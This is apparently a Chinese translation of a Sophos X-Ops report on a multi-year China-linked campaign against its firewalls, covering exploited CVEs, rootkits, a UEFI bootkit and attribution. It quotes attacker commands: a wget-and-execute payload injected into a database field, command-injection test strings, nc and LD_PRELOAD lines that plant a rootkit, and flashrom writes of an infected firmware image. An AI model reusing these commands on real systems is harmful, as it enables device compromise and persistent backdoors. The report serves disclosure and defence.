首次攻击并非针对网络设备，而是唯一记录在案的针对Sophos设施的攻击：位于印度的子公司Cyberroam总部。

2018年12月：揭开攻击路径

Sophos观察到一个低权限计算机——用来驱动Cyberroam办公室墙上显示屏的设备——正在进行网络扫描（MITRE ATT&CK 技术 T1046）。

对该设备的初步分析发现了常见的“利用系统自带工具”方式和用于持久化与侦察的普通恶意软件，表明攻击者相对不够高级。然而，基于设备上发现的一个SSH密钥，X-Ops 发现了利用技术战术和流程（TTPs）展开的攻击路径的起点，这些TTPs表明这是一个更具持续威胁的攻击。包括：

• 替换SSH和SSHD守护进程，X-Ops评估这些进程与ESET在其报告《The Dark Side of the ForSSHe》中命名为Onderon的恶意软件家族有关；该家族也被称为bl0wsshd00r67p1（T1554）。
• Windows和Linux版本的Gh0st远程访问木马（RAT）。
• 一种（对2018年来说）新颖的技术，通过滥用与AWS SSM相关的过度许可IAM配置，从本地设备转向云资产（T1078.004）。
• 以及一个此前未见过的大型复杂的rootkit（Sophos后来公开分析并命名为Cloud Snooper）（T1014）。

虽然这是唯一一次Sophos设施被直接攻击的事件，但它展示了一位适应能力极强的对手，可以根据需要升级攻击能力以实现目标。例如，攻击者展示了对AWS SSM（2018年相对较新的技术）的深入了解，并部署了使用ATT&CK技术T1205.002的内核级rootkit，具备隐蔽的命令与控制（C2）能力。

自2020年初开始，直到2022年大部分时间里，攻击者在多次攻击活动中投入了大量精力和资源，目标是面向互联网的设备管理门户（T1190）。

这两项被攻击的主要服务是：a) 用户门户，主要用于允许远程客户端下载和配置VPN客户端；b) 管理门户，用于设备的通用配置管理。尽管这些服务在默认情况下仅面向局域网（LAN），但由于COVID-19疫情带来的远程办公需求增加，越来越多的设备所有者将这两个门户设为远程可访问，攻击者正是利用了这一变化展开攻击。

在快速进行的一系列攻击中，攻击者利用了一系列它们发现的0day漏洞，并将其操作化，针对这些面向互联网的服务展开攻击。初始访问利用为攻击者提供了在低权限环境中的代码执行能力，随后通过其他漏洞利用和权限提升技术（T1059.004，T1203），在设备上安装了具备root权限的恶意软件。

CVE-2020-12271（Asnarök）

就在Asnarök攻击发生的前一天，X-Ops收到了一份外部漏洞奖励报告，报告了同一平台中的一个关键SQL注入（SQLi）漏洞，该平台也是攻击的目标。这次报告的漏洞与攻击中利用的漏洞不同，研究人员之前曾为Sophos的项目和其他项目做过贡献（并持续提供贡献），因此Sophos对这次漏洞报告与攻击有直接关联的可能性持低信心。然而，由于报告的时间（在攻击前一天）以及研究人员设备的位置（位于中国成都——后来被确定为本报告中活动的中心），这个提交被包含在此。

X-Ops收到了一些关于管理员可见的数据库字段 sfmipport 中的可疑值的报告。这一可见的伪装只出现在某些固件版本的设备上，其中在利用后自动化过程中，一个错误导致了清理过程失败。

对受影响设备的调查发现了一个SQL注入漏洞，该漏洞被Sophos标记为CVE-2020-12271。该漏洞与命令注入权限提升漏洞（T1059）一起使用，以获取设备的root访问权限并安装了Asnarök木马（T1203）。木马是通过以下命令注入数据库表后安装的：

||cd /tmp/ && wget https://sophosfirewallupdate[.]com/sp/install.sh -O /tmp/x.sh && sh /tmp/x.sh||

Asnarök攻击还包括首次尝试破坏设备热修复的行为，攻击者部署了一个脚本循环，持续将设备的管理员设置更改为不接受热修复（T1562.006）。

Sophos发布了一个自动部署的热修复补丁，用于修补CVE-2020-12271漏洞，终止并删除已识别的恶意软件，并（关键地）增加防火墙发送的遥测数据的数量和种类。

该热修复补丁为X-Ops提供了更多关于被恶意修改设备的洞察力，同时修复了CVE-2020-12271漏洞，并杀掉了设备内存中运行的已知恶意进程。

通过结合来自热修复的遥测数据、试用许可证注册数据和网页分析，X-Ops分析师拼凑出了攻击预定位的时间线。

最显著的是，发现了一个设备的可疑活动最早可追溯至2020年2月。遥测分析显示，在该设备中存在向数据库字段 sfmipport 写入的实验性命令注入值（用于Asnarök攻击）。该设备的IP定位于中国四川省的成都。

通过试用许可证数据进行追踪，发现了多个关联设备。这些设备的遥测显示了命令行访问和使用行为，与漏洞研究和利用开发一致，其中包括写入接口的 sfmipport 字段的命令行，测试向文件夹 /tmp 写入文件的能力:

||touch /tmp/exploit.txt|| :443;
echo xxx>/tmp/su1112;:443
:echo xxx>/tmp/su1112;:443

关联账户也被发现访问了有关设备架构的知识库文章。

X-Ops 进一步利用枢纽分析结合公开信息情报（OSINT）分析，得出中等可信度的结论，认为该设备属于四川沉默信息技术公司的双螺旋研究所，位于中国四川。

在对Asnarök攻击进行事后审查时，X-Ops 开发了一个专门的内核植入工具，部署到Sophos有高度信心被恶意漏洞研究团伙控制的设备上。该工具可以进行远程文件和日志收集，而不会在用户空间留下任何可见的痕迹。

X-Ops 请求荷兰国家网络安全中心（NCSC-NL）协助扣押托管Asnarök恶意软件主要指挥控制（C2）域名“ragnarokfromasgard[.]com”的服务器，该服务器位于荷兰。NCSC-NL作为中介与荷兰国家高科技犯罪单位（NHTCU）合作。NHTCU迅速提交了扣押服务器的授权请求。

X-Ops团队还请求美国的域名注册商将该域名的控制权转交给Sophos，以及其他由同一注册人注册并托管在同一服务器上的域名。

X-Ops开始与Sophos的产品工程团队合作，增加防火墙遥测数据收集过程中的新的通用扩展检测与响应（EDR）能力。

域名注册商将Asnarök恶意软件使用的域名及同一注册人注册的其他域名的控制权转交给Sophos（这些域名从未被用于任何合法目的）。X-Ops将这些域名指向由Sophos控制的接收服务器（sinkhole）。域名接管切断了攻击者的C2渠道，而接收服务器为Sophos提供了更多有关受感染设备的数据。

对接收服务器请求日志的分析识别出了许多不同的User-Agent和请求的URI。除了预期的来自少量未打补丁和已结束服务的Sophos设备的请求外，X-Ops还识别出了其他厂商的消费者和小型办公室路由器的User-Agent字符串和有效载荷请求，以及可能与Ragnarok勒索软件有关的各种请求（T1584.008）。

Sophos工程团队发布了一个热修复补丁，强制对可能受到影响的设备重置密码，并实施了登录验证码，以阻止自动凭证填充攻击。

Sophos X-Ops 发布了后续博客，披露了有关攻击的新细节：Asnarök攻击者在4月攻击进行中时，两次改变了攻击流程。

CVE-2020-15069（书签功能缓冲区溢出）

就在攻击者准备利用CVE-2020-12271漏洞进行Asnarök攻击时，另一个漏洞的开发已经在进行中了。通过回顾性威胁狩猎，X-Ops在此日期识别了后来被标记为CVE-2020-15069的漏洞的首次使用。

对设备的后续分析，以及对共享相同源IP的其他设备的分析，识别出一些与测试实验室有关的特征：

• 频繁的电源循环
• 恢复到以前的固件版本（表明使用磁盘快照恢复）
• 使用免费网络邮件提供商的注册数据（在本例中为中国的163.com）
• 运行不同且频繁更改固件版本的大量设备（物理和虚拟混合）
• 通过LAN接口连接的设备很少
• 使用私有IP地址的WAN接口，后面连接另一个设备进行网络地址转换（如华为设备）
• 追踪物理设备的序列号显示，这些设备是由合法合作伙伴购买，可能是二手转售的。

在Asnarök攻击开始后的第56天，攻击者开始利用一个定制Apache模块中的0day缓冲区溢出漏洞（CVE-2020-15069）。该漏洞利用与本地权限提升结合使用，在运行WAN门户设备上部署了恶意web shell（T1505.003）。

对攻击和web shell的分析显示，攻击者战术、技术和程序（TTP）发生了显著变化，规避了在Asnarök攻击中部署的几项防御措施：

• 无集中式C2

在Asnarök中，X-Ops能够接管C2域名，有效地中止了恶意软件的运行。而web shell则没有向外部C2请求命令，而是监听传入的命令。

• 简化

Asnarök恶意软件功能庞大且直接嵌入了大量功能，X-Ops可以对其进行逆向工程，并推测攻击者意图。通过使用提供命令执行的小型web shell，攻击者可以隐藏意图，并将有效载荷保持在X-Ops无法查看的服务器系统中。

• 隐蔽

web shell的简单性限制了检测机会，因为不需要额外的运行进程或持久性机制。此外，为了降低外部的可发现性，web shell会对没有提供正确密码的请求返回HTTP 400。X-Ops曾试图破解密码的哈希值，但未成功，这个哈希存储在web shell中。

X-Ops能够利用Asnarök攻击后加入的新遥测收集功能，快速识别出初始入口向量和受影响设备。此外，遥测还帮助团队识别出一个可能由攻击者拥有的“零号患者”设备，在4月9日该设备上部署了一个版本的web shell，比Asnarök攻击和此次攻击都更早。

事后分析识别出自6月17日以来，约175个唯一IP地址向受感染设备发送命令。这些IP地址都是匿名网络的一部分，模糊了攻击的真实来源（T1090.003）。

产品工程发布了一系列热修复补丁，用于修复CVE-2020-15069代码执行漏洞并清除设备上已安装的恶意软件。这些热修复补丁还恢复了攻击者更改的、使产品无法接收热修复补丁的设置。

在十二周的平静之后，X-Ops发现针对终止服务和未打补丁设备的活动再次使用了CVE-2020-15069漏洞。攻击负载窃取了设备上保存的凭据，并添加了一个后门。

此次攻击交付的有效负载与早前攻击中使用的不同——包括两个Linux shell脚本，名为patch.sh和IC.sh（T1059）。

IC.sh脚本从设备中窃取本地用户账户数据，并将其发送到一个位于香港的互联网服务提供商的IP地址。它还包含了一个编码的patch.sh副本，并将其写入文件系统。脚本在数据库中设置一个标志，禁用了自动热修复更新，每五分钟重新运行一次禁用命令（T1562.001）。攻击者部署IC.sh的位置与2020年4月Asnarök攻击中恶意脚本使用的位置相同（可能不是巧合）。攻击者还破坏了热修复机制，这一行为首次出现在2020年6月的书签缓冲区溢出攻击中。

patch.sh脚本每小时运行一次，试图删除数据库中可能暴露设备已被入侵痕迹的记录。

此次攻击的另一个显著特点是，攻击者直接与遥测系统交互，试图隐瞒其行为，并作为针对前一年4月Asnarök事件后实施的遥测改进的对策。

2020年6月30日 – 遥测验证

利用额外的遥测收集，威胁狩猎发现了一台具有可疑命令执行行为的设备。初步分析识别出一些异常组件，包括masscan（网络端口扫描器）和一个简单的远程访问木马（RAT）。后续分析进一步识别出21台受影响的设备。在所有案例中，初始访问被确定为通过弱SSH凭据实现的（T1110.001）。虽然X-Ops得出结论认为该攻击可能是孤立事件，与更大规模且更复杂的攻击无关，但它为额外遥测和威胁狩猎流程提供了早期的价值验证。

2020年7月9日：首次植入部署木马

通过遥测进行狩猎，X-Ops分析人员识别出一台设备，并以高度信心确定其属于Double Helix实体。在与法律顾问协商后，X-Ops部署了有针对性的植入程序，并观察到攻击者使用vim编写并运行一个简单的Perl脚本。尽管其价值较低，但这次部署作为情报收集能力的宝贵展示，提供了对攻击者控制设备的近实时可见性。

2020年7月14日：与 TStark 的首次接触

在追踪最早执行书签缓冲区溢出漏洞攻击的设备时，X-Ops识别出一个名为“TStark”的威胁行为者以及一组由该威胁行为者注册的设备（使用以“TStark”开头的Proton Mail邮箱地址）。

TStark集群的设备包含了一些最早与CVE-2020-15069（T1203）书签缓冲区溢出攻击相关的恶意负载。这些设备还表现出一些奇怪的遥测行为，表明存在间歇性的VPN使用，遥测来源快速切换于地理位置位于香港和成都的IP地址之间（T1133）。

X-Ops确定，后来注册到TStark身份的其中一台物理设备，之前曾被电子科技大学（UESTC）的一名研究人员注册。

2020年7月27日：木马部署的成果

在改进识别攻击者设备的方法后，X-Ops向与Double Helix实体关联的设备集群部署了有针对性的植入程序。

额外的可见性很快使X-Ops识别出一个以前未知且隐蔽的远程代码执行漏洞。以前的漏洞需要与操纵数据库值的权限提升技术结合使用（这是一种高风险且容易被检测到的操作），而这个新发现的漏洞则几乎不留痕迹，直接提供对根权限的访问。以下是导致发现新0day漏洞开发的命令行活动摘录：

gdb -p 2951
ls
ls
ls -lsa
nopcode -d -n nosync -t json -b
nopcode deny_remote_adminip -d -n nosync -t json -b "["ipaddress": "; touch /tmp/zz77; °, "addr_family":"2*), 192.168.31.187*, "timeout": "60", "addr_family": "0")* nopcode deny_remote_adminip -d -s nosync -t json -b "("ipaddress*: *; touch /tmp/zz77; *, "addr_family*:*2*), 192.168.31.187*, *timeout*: *60*, "addr_family": "0")*
ls
rm zz77
ls

X-Ops利用植入程序的功能来检索关于该漏洞的数据，识别出在暴力破解检测组件中存在通过X-Forwarded-For HTTP头进行命令注入的漏洞。随后，他们成功复现了该漏洞，并与工程团队合作修补了漏洞。

2020年7月28日：影响分析

威胁狩猎发现两台设备——一家律师事务所使用的一台和一家IT服务公司使用的一台——遭到了利用该漏洞的攻击。

X-Ops识别出这两台设备均建立了反向Shell连接，连接到同一个IP地址（属于一家位于美国的托管公司）（T1059）。

2020年7月30日：混淆热修复

Sophos向所有受影响设备部署了补丁，包括三天前发现的两台被攻陷的设备。由于之前的网络分析，X-Ops意识到对手正在监控Sophos知识库（KB）中与热修复和补丁相关的文章，因此有必要对修复进行混淆。Sophos工程团队设计的补丁不仅修复了漏洞，还解决了几个不相关的低严重性问题，以掩盖重要的新兴功能。

2020年8月9-13日：额外的木马情报

例行的设备遥测监控发现了两个新注册的可疑设备，符合额外的目标监控条件。

X-Ops在监控设备上检测到额外的可疑活动，包括/tmp目录中的二进制文件连接到外部IP地址的端口4438和4439。

后续分析识别出操作系统组件中存在一个低严重性的身份验证后远程代码执行漏洞（T1210）。X-Ops开始着手准备热修复，以修复该漏洞。

2020年8月13-14日：Rootkit #2：隐匿进化的挫败

在分析书签缓冲区溢出攻击时，X-Ops能够直接从“TStark”注册的设备上获取一个新的恶意软件样本。

该样本命名为libxselinux.so，是一个基于Winnti威胁组织（T1014）代码定制的用户态rootkit。

恶意软件有两个组件：一个核心引擎用于与指挥控制服务器通信，另一个是用户态rootkit模块，启动时枚举本地系统上的设备，然后执行核心模块（T1547）。

追溯性狩猎未发现除TStark设备以外的libxselinux.so副本。为防止未来可能的使用，Sophos主动部署了检测和阻止rootkit的保护措施（检测为Linux/Winnti-T）。

2020年8月21日：TStark 的准备工作

X-Ops从TStark设备上检索了多个文件。获取的文件中包含适用于Mac OS X和iOS的恶意软件，以及利用WebAssembly（wasm）漏洞的IFRAME注入代码（T1189）。

2020年8月31日 – 10月31日：针对西藏目标和Rootkit #3

Sophos与Volexity合作，协助一家为西藏流亡者提供支持的组织。对受影响设备的分析表明，与“TStark”威胁行为者工具（仅在10天前发现）以及Volexity称为Evil Eye的组织（归因于“多个中国APT行为者”）存在IOC重叠。

Volexity的研究人员还分享了他们在同一设备上发现的rootkit样本。X-Ops分析人员确定这些文件是一个名为Suterusu的可加载内核模块（LKM）rootkit的一部分，该rootkit可从GitHub仓库中获取（T1014）。Suterusu有效负载的可选功能已全部移除，因此其功能仅限于README文件中列出的18个命令。

2020年11月27日：低风险目标

近两年后，继印度的Cyberoam旧办公室遭遇攻击，Cyberoam产品线（当时已接近生命周期终点的遗留产品）也遭到了攻击。

攻击者利用了一个0day漏洞（后被标记为CVE-2020-29574），在受影响的设备上创建了一个名为“cybersupport”的新管理员级别用户账户（T1136.001）。

Sophos迅速发布了修补程序来修复该漏洞并删除攻击者创建的账户。公司也联系了已注册设备的所有者，建议他们要么升级设备，要么将设备停用。

2021年7月21日：ANSSI归因

在2020年11月对Cyberoam设备的SQL注入攻击发生八个月后，法国政府网络安全机构ANSSI公开将Cyberoam账户创建攻击归因于中国的APT-31威胁组织。

ANSSI公告中指出，受影响的Cyberoam设备被威胁行为者用作中继或代理来对其他设备（如Ivanti远程访问网关）发起攻击。现在，这种APT行为已很常见，通过这种方式使用受影响设备，帮助攻击者掩盖对其他目标设备进行攻击的真实来源。

自2021年起，攻击者似乎将攻击重点从大范围的无差别攻击转向针对特定实体的高度定向的“手动操控”攻击。目标包括政府机构、关键基础设施、研发机构、医疗服务提供商、零售、金融、军事和公共部门组织，主要集中在亚太地区。

“Personal Panda”（CVE-2022-1040）

Sophos第二次收到了一份既非常有帮助又存在可疑性的漏洞赏金报告。一位使用化名的安全研究人员向Sophos的漏洞赏金计划报告了一个0day漏洞，这个漏洞被指定为CVE-2022-1040。这位研究人员不愿透露真实身份，并声称自己位于日本，但设备的IP地址定位到了中国。他们获得了2万美元的赏金。

报告中包括两个不同的漏洞：SFOS中的身份验证绕过漏洞，以及OpenSSL中的命令注入漏洞，研究人员利用后者实现了特权提升并获得了root shell。

Sophos发布了一个热修复补丁以修补该漏洞。

通过回溯威胁狩猎，X-Ops发现CVE-2022-1040的活动利用早于漏洞赏金提交。虽然影响的范围有限，但受害者类型和时间显示出与中国政府外交政策目标一致的攻击模式，最值得注意的是：

• 在“一带一路”相关债务谈判关键期的高层政府部门
• 2020年8月遭受攻击的同一个与西藏有关的目标

Sophos发布了CVE-2022-1040的公告。

X-Ops持续进行威胁狩猎、对受影响实体的沟通及对受影响设备的分析，揭示了一个复杂的后期利用工具和战术技术和程序（TTP），显示出手动针对性的攻击和交付行为。

Sophos于2022年7月披露了部分调查结果。

除先前披露的内容外，X-Ops还发现了围绕CVE-2022-1040的活动簇，涉及一个新型的定制Rootkit：libsophos.so（T1014）。NCSC-UK随后分析了该恶意软件并称其为“Pygmy Goat”。

X-Ops发现了libsophos.so的两个副本，均使用CVE-2022-1040部署——一个部署在高层政府设备上，另一个部署在该政府部门的技术合作伙伴的设备上。

在部署的同时还发现了Gh0st RAT的副本。对libsophos.so的分析显示，这是一个完全定制的用户态Rootkit，仿效了Sophos产品的文件命名规则和行为（T1036）。

X-Ops的分析还显示，libsophos.so库通过使用LD_PRELOAD环境变量注入到系统的SSH守护进程（SSHD）中。这使得该库在其他系统库之前加载，有效地插入到SSHD进程中并改变其行为。特别是，它增加了监听和响应特殊ICMP包的能力，这些包如果被感染设备接收到，会开启SOCKS代理或反向Shell连接至攻击者选择的IP地址（T1090，T1059）。这种方法与2018年12月的Cloud Snooper攻击类似。

X-Ops能够追溯地将libsophos.so的开发与TStark行为者联系起来。在2022年2月18日，两个与TStark相关的设备（一物理一虚拟）的Shell历史记录显示，攻击者重命名并在他们的设备上运行了libsophos.so（又称libgoat.so），并测试了其持久性。

rm -f /lib/libsophos.so
nc 192.168.1.85 4444 > /lib/libsophos.so
mv /tmp/server_x32 /lib/libsophos.so
sed -e 's/exec /bin/dropbear/export LD_PRELOAD=libsophos.so
chmod +x /bin/killlibgoat
mv /tmp/goatserver_x64 /etc/libgoat.so
killall libgoat.so

攻击者设备上观察到的某个版本的libsophos.so与受害者设备上看到的具有相同的哈希值（c71cd27efcdb8c44ab8c29d51f033a22）。

其中一台设备还包含valgrind和prex的副本，这些工具通常用于调试和控制流跟踪。该设备管理员账户的电子邮件地址公开关联了一名中国的攻击性安全研究员和Linux shellcode专家。

Sophos在4月2日报告了OpenSSL的漏洞，该漏洞被分配了标识符CVE-2022-1292。

持续的分析发现了一种新的持久性TTP——被篡改的类文件嵌入在现有的Java存档（JAR）文件中。被感染的类文件被加载到一个可以访问互联网的Java Servlet中，并充当其他AES加密类文件的动态加载器，通过HTTP POST向其提供这些类文件（T1574.004）。Volexity在他们的DriftingCloud报告中进一步详细介绍了这种持久性机制。

威胁狩猎中发现了第三个运行libsophos.so rootkit（T1014）的设备，这是一个位于不同于初始目标的亚洲国家的军事医院。

OpenSSL宣布修复CVE-2022-1292。

在与Volexity合作获得了额外的IOC后（他们在DriftingCloud中进行了书面记录），X-Ops进行了额外的搜索，寻找与C2 IP地址192.248.152.58的通信。

搜索发现了一台设备，属于一家医疗技术供应商，运行了一个名为libiculxg.so的恶意软件样本。X-Ops的分析表明，libiculxg.so属于双用途对抗模拟框架“Sliver”。

Sophos X-Ops在三个会议上展示了一篇论文（“你的专属熊猫”），详细介绍了Sophos对CVE-2022-1040攻击及其恶意软件有效载荷的研究，这些会议包括：Virus Bulletin、BruCON和Saintcon。

隐秘信道（CVE-2022-3236）

在与微软应急响应团队合作时，X-Ops发现了一家亚洲大型金融服务机构的受感染设备。设备分析发现了一系列活动，这是Sophos后来公开披露的“隐蔽渠道”中的首次实例。

特别是，X-Ops在受影响设备中的小部分发现了两个新的TTP：

• “Personal Panda”攻击中使用的后门JAR技术的演变，用于嗅探设备Web界面处理的凭证。
• 利用嗅探到的凭证从局域网侧的域控制器执行DCSync凭证转储（T1003.006）。

X-Ops通过遥测追踪发现了其他设备中存在的后门JAR文件，并发现了一小群与“Personal Panda”攻击受害情况类似的设备。对受影响设备的初步分析显示，这些设备的行为与手动攻击部署一致：文件名和权限存在差异，日志清除程序方面也存在不一致性。

通过对未完全清理的Tomcat日志分析，确定了攻击的初始入侵点——Perl组件中的命令注入漏洞，后来被指定为CVE-2022-3236。进一步分析发现了一个可靠地识别攻击成功的遥测特征。对这一新指标的追踪显示，基于Java的木马仅部署到部分目标设备上，所有设备的主要持久性方法是后门的Perl组件（更多有关此次攻击中的恶意软件的信息请参阅Sophos的隐蔽渠道报告）。

Sophos开始推出补丁修复CVE-2022-3236漏洞，并清除所有受影响设备中的恶意软件。与此同时，针对受影响设备的所有者进行沟通，受害者主要（但不完全）集中在亚洲，特别是东南亚某国的军队和国家安全实体。X-Ops还在该地区发现了一些关键基础设施供应商（如水厂和发电设施）的攻击目标。由于这些实体的情报收集价值较低，X-Ops对该攻击组织可能准备进行破坏行动进行了低信心评估。

Sophos发布了关于CVE-2022-3236漏洞利用的咨询报告。

Sophos发布了额外的IOC。

X-Ops观察到攻击者扫描并利用CVE-2022-3236，主要针对已终止生命周期（EOL）且未修补的设备。这些攻击与2020年观察到的TTP类似，目标显得不分青红皂白，可能是为了建立后续攻击的操作中继站。所有攻击都使用了先前观察到的基于JAR的持久性技术，且一致性表明是自动化利用行为。确定的C2通道地理位置为香港的一家ISP（IPTelecom Asia）。

Sophos重新努力帮助那些使用EOL设备的实体升级到受支持的固件版本。

例行威胁狩猎中，X-Ops在已修补CVE-2022-3236的设备上发现了可疑活动，进一步调查确认了恶意JAR文件的存在以及与C2 IP的连接（T1406）。通过对C2的深入研究，发现了一些设备在日志中出现了CVE-2022-3236漏洞被成功利用的痕迹，尽管这些设备已经修补了漏洞。

X-Ops的日志分析发现漏洞利用时发生了异常。源码分析确定在运行旧固件版本的设备上可以绕过CVE-2022-3236补丁。通过提供格式错误的JSON，攻击者能够触发异常，从而绕过了用于缓解CVE-2022-3236的额外输入验证。在较新固件版本中，额外的代码加固措施阻止了此漏洞绕过的使用。

同日，X-Ops从一位非亚洲政府合作伙伴处获得情报，表明其地区内存在对易受攻击设备的活跃扫描。这一点尤其值得注意，因为先前观察到的CVE-2022-3236活动主要集中于东南亚目标。

Sophos工程团队发布了阶段性热修补程序来修补此补丁绕过漏洞。为了最大限度地覆盖受影响设备，补丁还反向移植到一些不再支持但广泛部署的固件版本中。

Sophos开始与受该绕过技术影响的少量实体进行沟通。尽管X-Ops观察到该绕过技术的利用非常有限，但受害者特征却很显著：不同于此前的定向攻击，受害者主要是非东南亚或南亚地区的政府机构。尽管后续利用的工具相对平常（主要是已知开源工具的变种，如zscan、fscan和Chisel），但这些工具与之前攻击所用工具有显著差异。同样，识别出的C2 IP地址（均属于Cloudflare和RackNerd）全部定位在非亚洲国家（此前，大多数C2 IP位于亚洲托管服务商）。

在“隐秘信道”攻击之后，攻击者试图通过针对特定目标的小规模利用现有漏洞以及改进的操作安全来保持低调，无论是在进行攻击还是在其自身设备上进行研究和分析。

这些攻击通常针对敏感安装环境，这些环境中的管理员往往对保持固件版本支持不够谨慎，因此未能获得已知漏洞的补丁。

2022年7月 – 2023年2月：简洁的优雅

在与该国的国家安全和情报部门合作中，X-Ops协助处理了一个核监管机构的事件。

例行监控中，发现一台设备从局域网侧内部Web服务器下载可疑二进制文件（T1105）。X-Ops通知了受影响的实体并请求更多细节。

在一个国家政府机构的协助下，X-Ops从设备中提取了恶意软件样本，并识别出一个远程访问木马（RAT）以及开源工具。这个RAT是一个简单的反向连接Shell，当设备收到特制的数据包时触发（T1205）。这种行为在“云潜行者”和“Personal Panda”攻击中也曾被观察到。由于反向连接C2 IP地址编码在特制数据包中且未存储于本地，分析人员未能识别该IP地址。

部署的开源工具包括快速反向代理（FRP）和sbd（一种嵌入强加密的安全netcat克隆）（T1090）。随后，CISA发布了一则关于威胁组织Volt Typhoon使用FRP的公告，虽然X-Ops未找到任何其他直接证据将这些攻击与Volt Typhoon联系起来。

为了实现持久性，攻击者将一个合法设备的二进制文件“nasm”重命名为“nasmd”，并将RAT放置于其原位置。系统已配置为在启动时运行“nasm”，运行时，RAT会生成原始的nasm二进制文件以避免影响系统功能。

对类似恶意软件的进一步搜索中，X-Ops发现了与核监管机构中发现的负载相似的设备，这些设备分别位于同一国家的军事指挥设施和国家首都的机场。

如同三年前CVE-2020-15069攻击中部署的TTP，这次攻击因其简洁性和技术手段而显著。这也是X-Ops首次明确观察到可能从设备局域网侧发起的攻击。X-Ops还发现了日志条目，时间分析显示这些日志可能是攻击者使用有效凭证部署其工具的证据，并观察到工具从RFC1918 IP地址下载（T1078）。

2022年8月15日：从Rootkit到Bootkit

一个新文件出现在一台物理设备上，X-Ops先前已将其识别为可疑并纳入其定向监控计划。命令行历史记录显示对设备固件进行了修改：

ftpget -u admin -p password 10.10.10[.]110 ./flashrom ./flashrom
ftpget -u admin -p password 10.10.10[.]110 xg210-remove-dxe-guard-bds-infected.bin xg210-remove-dxe-guard-bds-infected.bin
chmod 777 flashrom { dd bs=392446464 skip=1 count=1; cat; } < /dev/sda > ./ext4_1_19.img
./flashrom -p internal -c "Opaque flash chip"
./flashrom -p internal -c "Opaque flash chip" -r xg210-read.bin
./flashrom -p internal -c "Opaque flash chip" -w xg210-remove-dxe-guard.bin

X-Ops 成功提取了一个名为“/bin/XG210-rkloadtest.bin”的文件副本，并确认该文件为基于 VectorEDK 的 UEFI BIOS bootkit 的早期开发版本。

安装了此 bootkit 恶意软件的设备登记在一家看似位于广州的公司名下，但设备是由一家位于成都的公司购买，且该设备发送的遥测信息来自地理位置为成都的 IP 地址。

尽管部署了额外的检测手段，X-Ops 尚未在野外观察到这种功能的实际部署。

2023年3月23日 - 4月19日：“GO”瞄准供应链

X-Ops 例行的威胁狩猎发现，在一家支持多个战略行业的政府技术供应商设备上运行的可疑文件，这些文件仅在内存中存在，随后从磁盘上被删除。

X-Ops 成功从受影响的设备中提取了样本，并基于 C2 域名，确认了另一台同一实体拥有的受影响设备。进一步对所有该实体所属设备的狩猎发现了大量相关活动，除了一台设备外，其他所有设备均属于该实体（另一台设备属于一家国有电信公司）。

提取的样本包括：

• 端口映射工具 LCX
• Microsocks，一种开源的便携 SOCKS5 服务器，使用硬编码密码“Pa55W0rd”
• 一种全新且功能齐全的 64 位 ELF 后门，来源不明，可嗅探输入设备的用户和管理员凭据。由于设备的域连接特性，这很可能导致内部 Active Directory 特权凭据被盗 (T1649)
• 一个使用较少见工具“go-strip”混淆的 Go 二进制文件。该文件接收一个 DES 加密的配置作为参数，运行时连接到指定的 C2 服务器，提供命令执行和文件传输功能
• 攻击者使用 Go 和 Python 也显示了其工具相比之前观察到的活动更加现代化。

2023年5月17日-19日：固件升级持久化

在例行威胁狩猎过程中，X-Ops 在某个政府情报机构的设备上发现了一个远程 shell。

虽然这个远程 shell 并不特殊，但 X-Ops 确认了一种之前未观察到的持久化技术。攻击者使用开源工具 plthook，将钩子插入固件升级过程 (T1037.002)。该钩子将后门写入设备重启前用于新固件的临时分区，从而使其在固件升级后仍然存在（不过设备可以通过外部 USB 驱动器刷新固件来恢复）。

为了绕过完整性检查，攻击者还替换了验证固件中加密签名的二进制文件 (T1027.001)。

进一步分析后，X-Ops 认定恶意软件可能是通过有效的管理员凭证部署的 (T1078)。

X-Ops 还成功确认了一台可能由攻击者控制的设备，其中包含固件持久性恶意软件的副本 (T1542.001)。该虚拟设备地理位置为上海，表现出频繁的固件变更。值得注意的是，最近一次运行的固件版本与受影响实体的设备相同。

2024年3月：旧设备被用作 ORBs

Sophos 感谢 ANSSI、Bugcrowd、CERT-In、CISA、Cisco Talos、Digital Shadows（现为 Reliaquest 的一部分）、FBI、Fortinet、JCDC、Mandiant、Microsoft、NCA、NHCTU、NCSC-NL、NCSC-UK、NSA、Palo Alto Networks、Recorded Future、Secureworks 和 Volexity 对本报告或本报告涵盖的调查做出的贡献。

请参阅表 1 至表 10 了解本报告中提到的所有威胁行为者战术和技术。如需帮助将恶意网络活动映射到 MITRE ATT&CK 框架，请参阅 CISA 和 MITRE ATT&CK 的《MITRE ATT&CK 映射最佳实践》以及 CISA 的 Decider 工具。

表 1. 资源开发

表 2. 初始访问

表 3. 防御规避

表 4. 凭据访问

表 5. 发现

表 6. 横向移动

表 7. 命令与控制

表 8. 执行

表 9. 持久化

表 10. 权限提升

在这五年的调查中，分析人员密切关注了可能相关的研究和事件，并经常与报告的作者和团队合作。为了帮助进一步的研究，Sophos在此列出了一些帮助Sophos理解所跟踪的攻击者以及可能相关的组织和活动的研究作品。

• NCSC-UK 恶意软件分析报告 - Pygmy Goat (PDF)
• https://www.verfassungsschutz.de/SharedDocs/kurzmeldungen/EN/2024/2024-08-22-bfv-cybersecurity-insight-part-4.html
• Chinese State-Sponsored Group TA413 Adopts New Capabilities in Pursuit of Tibetan Targets | Recorded Future
• https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/
• https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
• Charting China’s Climb as a Leading | Recorded Future Global Cyber Power
• https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf
• https://web-assets.esetstatic.com/wls/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf
• CERTFR-2021-CTI-012.pdf (ssi.gouv.fr)
• Atlantic Council - Sleight of hand: How China weaponizes software vulnerabilities

Sophos将随着新资源的发布继续添加到这个列表中。

在Sophos撰写对本报告中描述的与Sophos相关事件的分析时，Sophos同样观察到多个厂商披露了大量网络设备漏洞，且这些漏洞通常伴随着活跃的利用行为。为了强调全球威胁活动的规模，并作为一个可能有用的社区资源，Sophos编制了一份由部分厂商提供的已公开文档的CVE列表，这些CVE影响网络设备（及其他边缘设备）。对于存在相关公开研究的漏洞，Sophos还包括了关于活跃利用行为和疑似威胁行为者的详细信息。此信息来自公开的来源，并基于截至2024年10月中旬的公开信息的尽力搜索，如下表所示。

在数据中包含了24家厂商。该列表基于市场份额和普遍关注程度编制。纳入此列表不应被理解为与太平洋沿岸地区报告中记录的情况存在任何关系。

